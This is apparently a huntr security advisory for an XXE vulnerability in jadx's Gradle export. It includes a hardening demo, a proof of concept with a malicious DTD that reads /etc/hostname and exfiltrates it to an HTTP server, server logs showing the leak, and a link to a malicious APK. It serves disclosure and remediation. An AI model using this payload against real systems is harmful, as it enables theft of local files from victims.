huntr
Haxatron
0D093863-29E8-4DD7-A885-64F76D50BF5E
History: Jan 12, 2022 - 3:22 p.m.

in skylot/jadx

2022-01-12 15:22:08
haxatron
www.huntr.dev
10
xxe vulnerability
androidmanifest
gradle export

EPSS

0.001

Percentile

33.4%

Description

The parseXml() function in ExportGradleProject is not secured against XML External Entity (XXE) injection: the DocumentBuilderFactory it uses does not set the disallow-doctype-decl feature (or otherwise disable external entity resolution), so any DOCTYPE in the input is honoured. JADX is therefore vulnerable to XXE when it parses a malicious AndroidManifest.xml while exporting an Android app to a Gradle project. The relevant lines are at

https://github.com/skylot/jadx/blob/f9bf27579e3ad5f89239ea9f571e8b50739e8920/jadx-core/src/main/java/jadx/core/export/ExportGradleProject.java#L142L147

DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
Document document = builder.parse(new InputSource(new StringReader(xmlContent)));

The DocumentBuilderFactory is created with JDK defaults and never has disallow-doctype-decl set to true, so external parameter and general entities declared in the manifest's DOCTYPE are fetched and expanded, which is what makes the parse vulnerable to XXE.
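The following is an added, self-contained example (not code from the jadx project or from the report author) that places the original unhardened parse next to a hardened version and runs both on a constructed AndroidManifest.xml that carries a DOCTYPE. The sample manifest uses an internal entity so the demo runs offline; a SYSTEM entity pointing at file:// or http:// is resolved by the same code path in the unhardened parser. The class and method names (ManifestXxeDemo, parseXmlUnsafe, parseXmlSafe) are assumptions chosen for the demo.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

public class ManifestXxeDemo {

    // Constructed sample manifest (not a real APK's manifest). The DOCTYPE declares
    // an internal entity so this runs without network or filesystem access; in the
    // real attack the entity is SYSTEM "http://attacker/malicious.dtd" or a file:// URI.
    static final String MANIFEST_WITH_DOCTYPE =
        "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"no\"?>\n"
      + "<!DOCTYPE manifest [<!ENTITY xxe \"entity-was-expanded\">]>\n"
      + "<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\""
      + " package=\"&xxe;\"/>\n";

    // Mirrors the original parseXml(): factory with JDK defaults, DOCTYPE allowed,
    // entities (internal and external) expanded.
    static Document parseXmlUnsafe(String xmlContent) throws Exception {
        DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
        return builder.parse(new InputSource(new StringReader(xmlContent)));
    }

    // Hardened variant: reject any DOCTYPE outright (the fix the report calls for), and
    // additionally switch off external entities, external DTD loading, XInclude and
    // entity expansion as defence in depth in case a different parser implementation
    // does not honour the first feature.
    static Document parseXmlSafe(String xmlContent) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        return factory.newDocumentBuilder().parse(new InputSource(new StringReader(xmlContent)));
    }

    public static void main(String[] args) throws Exception {
        // Unhardened parser: the entity is expanded into the package attribute.
        Document unsafe = parseXmlUnsafe(MANIFEST_WITH_DOCTYPE);
        System.out.println("unsafe parser: package=\""
                + unsafe.getDocumentElement().getAttribute("package") + "\"");

        // Hardened parser: the DOCTYPE itself is rejected before any entity is resolved.
        try {
            parseXmlSafe(MANIFEST_WITH_DOCTYPE);
            System.out.println("safe parser: accepted manifest (unexpected)");
        } catch (SAXParseException e) {
            System.out.println("safe parser rejected manifest: " + e.getMessage());
        }
    }
}
```

With the JDK's built-in Xerces parser the hardened path throws a SAXParseException as soon as it sees the DOCTYPE, so no entity, internal or external, is ever resolved; an AndroidManifest.xml never legitimately needs a DTD, so rejecting DOCTYPE outright costs nothing for this use case.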

Proof Of Concept

1: Build an Android app whose AndroidManifest.xml starts with the following DOCTYPE. You can use my pre-built APK with a malicious AndroidManifest.xml, https://drive.google.com/file/d/1D4QBk-YJH8xadGv1vpz9rBTDN9X43pUC/view?usp=sharing, to test this.

<?xml version="1.0" encoding="utf-8" standalone="no"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://127.0.0.1/malicious.dtd"> %xxe;]>
... [---malicious APK continued here---]

2: Open a new terminal and save the following as a file named malicious.dtd

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://10.0.2.4/?x=%file;'>">
%eval;
%exfiltrate;

3: In the same terminal as step 2, start an HTTP server (which mimics the attacker's server, serving malicious.dtd) and leave it running

➜  ~ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

4: Now, export the APK to Gradle

jadx -e /path/to/malicious/apkfile.apk

5: The HTTP server (which mimics the attacker's server) first receives the request for malicious.dtd and then receives the contents of the victim's /etc/hostname in the query string

➜  ~ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.0.2.4 - - [12/Jan/2022 14:36:41] "GET /malicious.dtd HTTP/1.1" 200 -
10.0.2.4 - - [12/Jan/2022 14:36:41] "GET /?x=testserver HTTP/1.1" 200 -

Impact

This vulnerability allows XXE (information disclosure of local files readable by the JADX process, exfiltrated via out-of-band HTTP requests as above) when a user is tricked into exporting a malicious Android app with a crafted AndroidManifest.xml to Gradle.

Patch

https://github.com/Haxatron/jadx/commit/c6a78c0d6dc990a4a0f8962d51823aa6ca3aefd2
